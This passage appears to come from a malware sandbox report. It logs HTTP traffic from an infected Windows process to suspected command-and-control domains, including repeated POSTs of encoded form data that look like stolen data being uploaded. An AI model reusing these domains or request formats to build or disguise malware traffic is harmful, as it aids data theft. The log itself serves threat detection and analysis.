                                                Data Ascii: +ikK9awcX0x964RDcB0hg+moFmUo3b5cl8A9qBInEvLYP0tYCueHUVkuwagse2lRYn6XiHgYgd4xdj44VHT4t5NWHf9i1DG/YWP+j5iu47iUL0tAPapb4o7dYMDDrr7jH6AzJxXHGVVLijEju1b1USbmUQwiWYbBKhNAjOTcPLDVFmptMGInYNgpN6In//aXXbxt4GO6QWBlt4BLG0LuZmBIdF+Ao+LDGYzngRaHcwLzBVSbiz6
                                                Aug 27, 2024 08:00:57.574286938 CEST11034OUTData Raw: 55 70 4b 75 4c 30 48 59 64 64 46 65 30 43 4b 65 6c 43 6f 43 78 34 56 65 6a 4b 35 5a 79 68 46 59 35 6d 67 32 32 46 63 47 69 6f 37 7a 71 55 71 57 31 45 37 66 5a 33 4e 59 36 42 49 75 39 67 31 77 4b 56 4f 68 45 49 37 4c 55 62 35 54 75 75 31 7a 71 32
                                                Data Ascii: UpKuL0HYddFe0CKelCoCx4VejK5ZyhFY5mg22FcGio7zqUqW1E7fZ3NY6BIu9g1wKVOhEI7LUb5Tuu1zq2i9Fr1jOl8Hct5tp2s5sstoLMfXtkyE0E2AOutBRBp24JOjbDz0BlzSTiI01m2fCG/P5fFGrR7FwVL0YDAwlrRumU5mwiR1UJVoHujuwoNgRUekP/J4ULz0PV3OKYoPYlCqHctGUzdIew/z7BmNJAcadL7yMQ4cxwT
                                                Aug 27, 2024 08:00:57.807780027 CEST225INHTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Tue, 27 Aug 2024 06:00:57 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 19
                                                X-Rate-Limit-Reset: 2024-08-27T06:01:02.6986999Z


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                44192.168.11.204988585.159.66.93807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:59.880530119 CEST553OUTGET /c0kl/?wXB=brv4Erb&ij60MtY=AxZR1MxN1yP04/KkfJjqNmRSK4d8g2rgChYpgYbN8LwS/ds0321h0MeEKpKCay63h/JFzZR/nOfV69IulQUTnqrvqwrwGbRyvD357dhiEinhnUxdss5AyLg= HTTP/1.1
                                                Host: www.emeluzunmoda.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:01:00.113989115 CEST225INHTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Tue, 27 Aug 2024 06:01:00 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 19
                                                X-Rate-Limit-Reset: 2024-08-27T06:01:05.0052375Z


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                45192.168.11.2049886176.57.64.102807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:01:05.485650063 CEST817OUTPOST /mktg/ HTTP/1.1
                                                Host: www.ayypromo.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.ayypromo.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.ayypromo.shop/mktg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 35 52 79 46 73 36 2f 65 6a 6a 55 6f 55 6e 49 75 64 63 39 47 61 69 6e 74 34 46 70 67 67 4a 59 6e 64 34 4d 76 59 49 54 37 78 63 72 63 66 6e 55 69 41 43 68 51 46 49 35 49 61 58 73 38 53 6d 61 42 6f 43 51 78 51 2b 68 51 31 45 59 62 62 53 42 4b 41 48 4b 48 54 34 6b 54 67 63 53 46 67 31 44 2f 74 45 6e 4a 43 37 4e 72 66 4b 33 6c 6b 70 58 4d 68 30 30 50 38 4b 78 33 64 42 4c 63 72 55 2b 46 64 44 54 43 46 69 39 6c 48 78 38 48 4f 72 63 6a 4c 35 6f 36 58 32 72 33 53 57 61 79 4f 6b 43 2f 62 34 38 4b 76 61 68 6e 73 41 41 70 64 46 37 72 37 2f 69 36 69 4f 66 43 54 6a 7a 56 49 73 39 35 7a 67 3d 3d
                                                Data Ascii: ij60MtY=5RyFs6/ejjUoUnIudc9Gaint4FpggJYnd4MvYIT7xcrcfnUiAChQFI5IaXs8SmaBoCQxQ+hQ1EYbbSBKAHKHT4kTgcSFg1D/tEnJC7NrfK3lkpXMh00P8Kx3dBLcrU+FdDTCFi9lHx8HOrcjL5o6X2r3SWayOkC/b48KvahnsAApdF7r7/i6iOfCTjzVIs95zg==
                                                Aug 27, 2024 08:01:05.754682064 CEST749INHTTP/1.1 404 Not Found
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg1_=265J2Y2ZbcJAwSS7AN9S; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:05 GMT
                                                Date: Tue, 27 Aug 2024 06:01:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 340
                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                ETag: "154-56d5bbe607fc0"
                                                Accept-Ranges: bytes
                                                X-Frame-Options: SAMEORIGIN
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                46192.168.11.2049887176.57.64.102807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:01:08.145081997 CEST1157OUTPOST /mktg/ HTTP/1.1
                                                Host: www.ayypromo.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.ayypromo.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.ayypromo.shop/mktg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 35 52 79 46 73 36 2f 65 6a 6a 55 6f 53 45 51 75 62 50 6c 47 62 43 6e 69 33 6c 70 67 37 35 59 6a 64 34 41 76 59 4d 6a 72 78 50 66 63 66 47 6b 69 42 47 56 51 45 49 35 49 56 33 73 35 4e 32 61 4f 6f 43 64 4f 51 2f 4e 51 31 45 63 62 55 42 5a 4b 48 33 4b 49 48 6f 6b 55 68 63 53 45 33 46 44 70 74 45 6a 37 43 36 4a 72 66 2b 48 6c 6c 72 50 4d 72 46 30 41 78 4b 78 78 4d 52 4c 62 69 30 2b 58 64 44 76 67 46 6e 77 65 45 41 34 48 4f 4b 38 6a 4b 35 6f 35 5a 47 72 77 4f 6d 62 6c 4e 31 6e 30 56 72 38 43 6e 49 4a 30 67 7a 5a 52 63 55 50 4a 39 4a 4b 4b 38 4d 2b 35 55 68 4b 71 47 4e 5a 70 73 37 41 44 54 46 6c 6d 49 6c 45 46 2b 6b 49 78 73 6b 6f 6a 43 2f 5a 75 64 36 41 52 44 63 4d 63 48 6d 34 73 6e 48 69 61 71 73 72 68 6b 78 63 74 31 61 67 66 5a 62 64 75 78 4f 41 4a 44 2b 5a 5a 79 75 4d 36 4d 42 47 78 58 52 44 79 33 6e 56 4d 73 78 43 72 65 44 38 78 55 6d 70 46 62 67 61 4c 44 53 6f 72 52 33 37 4e 7a 66 67 42 75 42 55 41 56 4e 48 46 51 48 36 4c 4e 4f 32 2b 4e 54 57 71 64 4c 66 53 45 70 4d 57 4a 55 [TRUNCATED]
                                                Data Ascii: ij60MtY=5RyFs6/ejjUoSEQubPlGbCni3lpg75Yjd4AvYMjrxPfcfGkiBGVQEI5IV3s5N2aOoCdOQ/NQ1EcbUBZKH3KIHokUhcSE3FDptEj7C6Jrf+HllrPMrF0AxKxxMRLbi0+XdDvgFnweEA4HOK8jK5o5ZGrwOmblN1n0Vr8CnIJ0gzZRcUPJ9JKK8M+5UhKqGNZps7ADTFlmIlEF+kIxskojC/Zud6ARDcMcHm4snHiaqsrhkxct1agfZbduxOAJD+ZZyuM6MBGxXRDy3nVMsxCreD8xUmpFbgaLDSorR37NzfgBuBUAVNHFQH6LNO2+NTWqdLfSEpMWJURcbiUM/GMGHl3Z+Wf3fGExixfwQ7uf1MNbqyMQlhn2cWoj1EVma1UOwYoGUQmynGtvXekUAME6BxUaKt+6RDfdYAR+OTlPwqHdOg9ouzx0FjYEhExTF1ww7NcFitVmlRkTJZpm354Cfsktq89oHWCZgG2a4+hQBXuxPU/3uNmeSnpdfl9NWPOf9j4xyYDVT7go2E7XZ4efM94=
                                                Aug 27, 2024 08:01:08.416161060 CEST749INHTTP/1.1 404 Not Found
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg1_=zeOHFGGvHLrata6NIjUS; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:08 GMT
                                                Date: Tue, 27 Aug 2024 06:01:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 340
                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                ETag: "154-56d5bbe607fc0"
                                                Accept-Ranges: bytes
                                                X-Frame-Options: SAMEORIGIN
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                47192.168.11.2049888176.57.64.102807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:01:10.802206993 CEST2578OUTPOST /mktg/ HTTP/1.1
                                                Host: www.ayypromo.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.ayypromo.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.ayypromo.shop/mktg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 35 52 79 46 73 36 2f 65 6a 6a 55 6f 53 45 51 75 62 50 6c 47 62 43 6e 69 33 6c 70 67 37 35 59 6a 64 34 41 76 59 4d 6a 72 78 4f 6e 63 65 30 73 69 41 68 4a 51 48 49 35 49 63 58 73 34 4e 32 61 70 6f 43 56 43 51 2f 78 71 31 43 41 62 61 7a 78 4b 47 46 53 49 58 34 6b 56 34 73 53 47 67 31 44 62 74 45 6e 76 43 36 4e 52 66 4c 54 6c 6b 72 66 4d 68 57 73 50 7a 61 78 33 4d 52 4c 48 30 45 2f 67 64 44 72 77 46 6e 30 65 45 43 38 48 4e 59 55 6a 47 4f 55 35 51 32 72 7a 46 47 62 36 48 56 6e 52 56 72 70 37 6e 49 4a 4f 67 77 56 52 63 53 44 4a 38 4f 65 4a 2f 73 2b 35 4b 52 4b 70 43 4e 46 79 73 37 63 68 54 47 35 6d 49 6c 73 46 2f 45 49 78 6f 42 63 38 56 76 59 6c 4d 4b 41 4b 4f 38 42 77 48 6d 74 64 6e 44 36 61 71 63 76 68 6d 47 6f 74 7a 2b 38 66 48 4c 64 73 31 4f 41 67 61 75 5a 2f 79 75 64 52 4d 46 32 68 58 54 50 79 31 47 31 4d 70 51 43 6f 49 7a 39 34 61 47 70 55 66 67 47 50 44 52 51 33 52 33 36 56 7a 62 34 42 75 77 45 41 55 4d 48 45 64 33 36 4d 41 75 32 72 57 47 4f 61 64 4c 44 4b 45 6f 31 62 4a 58 [TRUNCATED]
                                                Data Ascii: ij60MtY=5RyFs6/ejjUoSEQubPlGbCni3lpg75Yjd4AvYMjrxOnce0siAhJQHI5IcXs4N2apoCVCQ/xq1CAbazxKGFSIX4kV4sSGg1DbtEnvC6NRfLTlkrfMhWsPzax3MRLH0E/gdDrwFn0eEC8HNYUjGOU5Q2rzFGb6HVnRVrp7nIJOgwVRcSDJ8OeJ/s+5KRKpCNFys7chTG5mIlsF/EIxoBc8VvYlMKAKO8BwHmtdnD6aqcvhmGotz+8fHLds1OAgauZ/yudRMF2hXTPy1G1MpQCoIz94aGpUfgGPDRQ3R36Vzb4BuwEAUMHEd36MAu2rWGOadLDKEo1bJX9cBCUMqR4BNV3Dx2erbGEmixTCQ66l0/Jb4RkQyBnxXWon7kVge1UOwYViUQqynTBvFZgUWPc6MRUcKt+rRDStYApcOTUYwv3dN05otwpzVjYBlEx6LV9q7JEdispcmmcTKZ5mhJ4NZMkut88zRm/agFSK4/UXBUuxNCSY8sCJBWMUdWN7RdmL9DsUybn4NPgOwiudLKOaR63VeHEwjhT6qJuG4ysNm+N1H4Qf4RBXaPQ2hbASg6rug5KefxHr3BU95eHwmx3MNtbUYNk5ofzGdWj96BGQHT4uLTMCj2V/H21k7RpGuDcQSRRM7e1eoxtWiAQ4lKJq1RUPHzRZxCSUZ4si5B+1jY0nHOQ8iW+EwUcO4xYIQD+sUF0frelyRK1qvo7WfoUGHwTcgXTY7DYcS+74/C+TXKIaWeFvgu6kB8WEOF44NCMc4KI0qE9RJ9uGb8QTVBJXWcX3EYXQXXcj8WiT+NpeOrgsBgvN00M+2Ly4+FGwPzXPeKkbaHasUnv5fbEt1IeWRdBN9oaF89J+3G8Sgw6/yVfexJVldahqNBrDU5+PaFokLK3KX5MNGIXjbrreheH7HvZvQ4ftEn0Hh1lumVpSWXiuM+1FrURoaw4hxOza9l0APG09HCfWp+/7rIBBJqwftWQK3l4c87+gcJnX7pW39mhc [TRUNCATED]
                                                Aug 27, 2024 08:01:10.802246094 CEST3867OUTData Raw: 66 6a 72 45 59 58 4d 65 36 4b 76 65 35 66 58 72 74 67 33 78 74 74 76 37 69 58 6a 73 57 4a 38 32 36 45 35 4d 59 46 47 52 5a 6d 6d 69 55 37 6e 69 48 6e 43 50 75 59 62 6e 63 70 72 6b 34 4e 56 67 32 48 59 30 53 54 53 6f 46 42 49 69 38 48 2b 70 37 37
                                                Data Ascii: fjrEYXMe6Kve5fXrtg3xttv7iXjsWJ826E5MYFGRZmmiU7niHnCPuYbncprk4NVg2HY0STSoFBIi8H+p77BN+vxUS2on2MT/ZC4NuTxqRvMYVKFsKgMEvZjNuM9z81wybc1HWpuLZaXiYjaXjfJMkpSqxKAskOBo6TVNy0U1f9IFXqBVSOT5cJnU1Xgitz7n4md25Nyjt1wP/nXAqUbEI+8HKU1uxjzO8WVubR0w7otChpwTrU/
                                                Aug 27, 2024 08:01:10.802320004 CEST6445OUTData Raw: 57 41 31 4b 30 66 65 37 42 6c 79 32 76 7a 63 5a 76 48 45 54 43 65 73 5a 45 2b 70 2b 50 44 33 74 4f 76 38 73 70 63 68 4c 56 66 47 47 6b 66 52 71 52 59 61 2b 64 7a 77 33 6e 4e 66 34 71 6f 43 79 50 44 6a 63 55 48 4a 50 66 46 32 6e 45 4c 41 62 37 55
                                                Data Ascii: WA1K0fe7Bly2vzcZvHETCesZE+p+PD3tOv8spchLVfGGkfRqRYa+dzw3nNf4qoCyPDjcUHJPfF2nELAb7URf2zYvsIiYr89lfHbXOirViaTDppk+3J6ZmS2fLdn/CABm/xR8wFfhsOw4Tqk/tALq19Xg0bm/g9ziLxyiYmToBWAdrYFuUZfGshlQYnNKAdBoUqR33ehXA3GPpev4LTvNQ05sPZWzGjLqj31yy3xuYFxr9hO32b9
                                                Aug 27, 2024 08:01:10.930778980 CEST2578OUTData Raw: 4e 38 65 4e 6a 35 30 77 4c 6f 38 4e 78 56 79 67 36 72 70 72 6a 44 76 7a 31 6f 72 77 53 77 34 41 34 38 63 35 76 6b 46 46 47 65 73 4d 42 75 59 6c 62 42 4b 6f 70 70 62 56 30 75 68 46 4d 51 73 75 68 58 61 76 4c 76 33 67 38 75 32 48 54 4c 45 4c 2f 61
                                                Data Ascii: N8eNj50wLo8NxVyg6rprjDvz1orwSw4A48c5vkFFGesMBuYlbBKoppbV0uhFMQsuhXavLv3g8u2HTLEL/aTOv8mx2mfAythyfDYZcWTSUQZ7ufcbc0e1Iu5uzf7mjTOCkVtZfHwFXhvVxDbMvOLfNqb2TksNQH9k4oi08jQXpKTjYYcPxmgLCTYW1MxQ/pDOojCyvPDTa+C2wHhYTgK94IlWw8TwOGnaHmmoKlR+W9oTv+Z3OJW
                                                Aug 27, 2024 08:01:10.930951118 CEST19335OUTData Raw: 72 58 36 54 35 7a 45 78 70 63 79 52 2b 50 4c 35 4b 50 2b 2f 7a 57 4c 36 49 70 57 6a 65 30 47 6b 56 6a 57 44 44 45 52 55 75 62 7a 75 39 4a 48 6b 4d 31 4c 76 34 45 6a 6e 2b 2b 63 47 57 2b 32 34 54 64 31 61 4e 75 39 6b 59 36 2b 50 4c 62 53 72 51 67
                                                Data Ascii: rX6T5zExpcyR+PL5KP+/zWL6IpWje0GkVjWDDERUubzu9JHkM1Lv4Ejn++cGW+24Td1aNu9kY6+PLbSrQgBqf7HAMhICl27qk6cwYbH1S9tFwHHCWyiuJ/veeqDm0W5dhBpAr48JF6PW5FEzsjYjs89UgCmLDZQdVzxsGhQRIf9CzHNcXDOokqfrfoaIUJdhSsLRhuU4UTPDtSsdpfExMEFaEisObKV1rIiEuvkvJ+3f58eHn5x
                                                Aug 27, 2024 08:01:10.931112051 CEST1289OUTData Raw: 37 49 50 77 66 69 43 56 50 75 75 4e 30 45 33 58 76 59 6e 4a 41 55 41 42 4c 58 74 5a 6c 61 41 56 79 50 71 79 4e 4e 70 71 62 79 47 7a 31 42 71 4d 30 4b 41 45 67 6a 44 6a 75 43 45 63 47 5a 55 6b 41 73 38 4b 32 6b 51 70 30 72 4b 54 77 4c 78 4f 79 76
                                                Data Ascii: 7IPwfiCVPuuN0E3XvYnJAUABLXtZlaAVyPqyNNpqbyGz1BqM0KAEgjDjuCEcGZUkAs8K2kQp0rKTwLxOyvKjE0/8UySyCxML6UTGVdzOHebTxjERwSVc5K6GM2t0LIr2V/C/U24fVTzr7JgQOv7XjudhitRFCGEioUs24wQ2OIx7iNf4esu2Ya9v1wDICLRBvn/s1ObUqrqm7c65Ptx6cx47WteE1Emaupk+JZ/c1GgJGJ2VNq+
                                                Aug 27, 2024 08:01:11.058568954 CEST2578OUTData Raw: 70 6a 6a 4b 34 35 58 51 46 47 2b 6a 75 42 6c 74 44 73 74 63 5a 63 77 4d 73 79 75 41 69 58 48 41 5a 66 61 62 36 4d 55 55 53 44 46 6f 69 4a 31 46 44 72 5a 51 6f 70 55 31 50 66 54 57 57 4c 56 35 79 73 33 32 76 70 6e 36 30 74 72 47 73 33 4b 52 71 36
                                                Data Ascii: pjjK45XQFG+juBltDstcZcwMsyuAiXHAZfab6MUUSDFoiJ1FDrZQopU1PfTWWLV5ys32vpn60trGs3KRq6NokO+zPnP2/UpbDdfSOSaQmhGjdguG+Vz6CvW1altsjGfcqQIT2WxqChMJCIJKvdcGQYTLP9Db7pLFbRkMkqS5oO01TeV02IsTDQIywCnDAZUjmlzBPa+/Dq123Uyk0/0CpQtgw7PmfjdajxJCejU8ftdiRl2QCay
                                                Aug 27, 2024 08:01:11.058742046 CEST2578OUTData Raw: 76 76 77 73 56 45 57 6f 70 4c 32 4e 6d 36 7a 33 61 49 74 77 49 77 79 4d 79 71 65 6f 45 70 61 69 51 41 68 69 42 47 73 71 43 2f 38 54 67 42 4c 7a 2f 56 56 65 55 6f 67 4c 70 4a 34 6e 4d 35 43 64 67 64 33 72 75 6d 66 38 72 79 38 55 4d 53 79 78 44 75
                                                Data Ascii: vvwsVEWopL2Nm6z3aItwIwyMyqeoEpaiQAhiBGsqC/8TgBLz/VVeUogLpJ4nM5Cdgd3rumf8ry8UMSyxDum365ZZ4HsTZ995hK/cuCjjxK+k0tsf6m0IUiNJzOozUVZydQCdM06m7Q51Z5RGr257Gjbpy9pv4veWOKPqA1kO0xRA852+jJ40JI+7Sa040GoACgXGy/DVablag3SU6eWg+zECaiyRIuoKM/xrspbldXjIBTEJ3RG
                                                Aug 27, 2024 08:01:11.059779882 CEST2578OUTData Raw: 6b 4a 6c 6c 43 37 44 70 67 38 43 72 75 65 6f 42 64 44 66 36 72 79 48 48 72 30 6f 47 4b 72 48 35 49 47 31 48 43 42 77 75 44 41 74 6f 37 59 58 70 53 4b 37 32 68 76 49 67 64 6a 61 47 58 63 48 51 67 50 4c 73 4c 5a 39 4b 75 39 39 2b 36 35 57 4b 62 32
                                                Data Ascii: kJllC7Dpg8CrueoBdDf6ryHHr0oGKrH5IG1HCBwuDAto7YXpSK72hvIgdjaGXcHQgPLsLZ9Ku99+65WKb2pI8IA4lBrZ/ZBUZ4I142ZsWGSdn8S+HNiYO4MIMrRKXhkmUz3JjTJI7dOea2JJ2WxibhdtngJzs3BK53o+yxbM+1/3FQYCAAg5yjOFuRaSZ03poC/D6CDIkE2pX6koJ8pKWHAcwOnlFXE0QsKA54wPty9XPbh7GYH
                                                Aug 27, 2024 08:01:11.059952974 CEST9728OUTData Raw: 47 6a 51 74 61 30 2f 62 36 6c 62 49 73 70 2b 5a 72 46 6a 74 72 53 6a 51 6d 47 79 62 77 46 6d 56 76 6d 74 50 79 63 2f 70 54 4e 4d 4d 36 56 6b 4d 6d 4a 46 78 69 76 4e 2b 34 33 4f 55 2f 2b 61 53 37 53 42 65 71 65 4a 6e 45 73 73 77 5a 70 73 45 64 51
                                                Data Ascii: GjQta0/b6lbIsp+ZrFjtrSjQmGybwFmVvmtPyc/pTNMM6VkMmJFxivN+43OU/+aS7SBeqeJnEsswZpsEdQ5BaGyEwcB9kTJk4QBgX4oSdIbmLOz5+B9Ugqp+aHB1a0mPRBqPC3995sCA+Y0stzhP0cAkulIz3S8fhcMIyVS/E4jSOYc0BY378gPujy+HCmQVMz9pzuWXfgcCTbUD3heNlH3zzMMBWZNs/EzLGbrmGmPRvRGO9xP
                                                Aug 27, 2024 08:01:11.419682980 CEST749INHTTP/1.1 404 Not Found
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg1_=CA7302n0o7hNsgNbFqiI; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:10 GMT
                                                Date: Tue, 27 Aug 2024 06:01:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 340
                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                ETag: "154-56d5bbe607fc0"
                                                Accept-Ranges: bytes
                                                X-Frame-Options: SAMEORIGIN
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
